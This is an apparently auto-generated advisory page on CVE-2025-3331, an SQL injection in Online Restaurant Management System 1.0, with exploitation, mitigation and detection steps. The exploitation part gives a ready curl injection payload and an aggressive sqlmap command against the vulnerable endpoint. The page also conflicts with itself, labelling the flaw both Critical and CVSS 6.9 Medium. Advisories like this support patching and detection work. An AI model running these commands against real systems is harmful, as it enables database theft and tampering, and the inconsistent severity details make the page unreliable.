Online Restaurant Management System 10, SQL Injection, CVE-2025-3331 (Critical)

The CVE-2025-3331 vulnerability in Online Restaurant Management System 1.0 allows unauthenticated remote attackers to execute arbitrary SQL queries via the `mode` parameter in /payment_save.php. The flaw arises due to improper input sanitization, enabling SQL injection when user-supplied data is directly concatenated into SQL statements. Attackers can exploit this to extract sensitive database information, modify data, or execute administrative operations. The vulnerability is remotely exploitable with no authentication required, earning a CVSS 4.0 score of 6.9 (MEDIUM).

DailyCVE Form:

Platform: Online Restaurant Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/08/2025

What Undercode Say:

Exploitation:

  1. Craft a malicious HTTP POST request to /payment_save.php:
    curl -X POST -d "mode=' OR 1=1--" http://target.com/payment_save.php
    

2. Use SQLmap for automated exploitation:

sqlmap -u "http://target.com/payment_save.php" --data="mode=1" --risk=3 --level=5

Mitigation:

1. Patch by implementing prepared statements:

$stmt = $conn->prepare("UPDATE payments SET status=? WHERE mode=?");
$stmt->bind_param("ss", $status, $mode);

2. Apply input validation:

if (!preg_match("/^[a-zA-Z0-9]+$/", $_POST['mode'])) {
die("Invalid input");
}

Detection:

1. Scan with Nmap NSE script:

nmap --script http-sql-injection -p80 target.com

2. Monitor logs for suspicious patterns:

grep -E "mode=.[';]" /var/log/apache2/access.log

Analytics:

  • Attack Vector: Network (HTTP)
  • Privilege Required: None
  • Exploitability: High (Public exploit available)
  • Impact: Confidentiality/Integrity Loss

References:

End of Report.

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3331
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top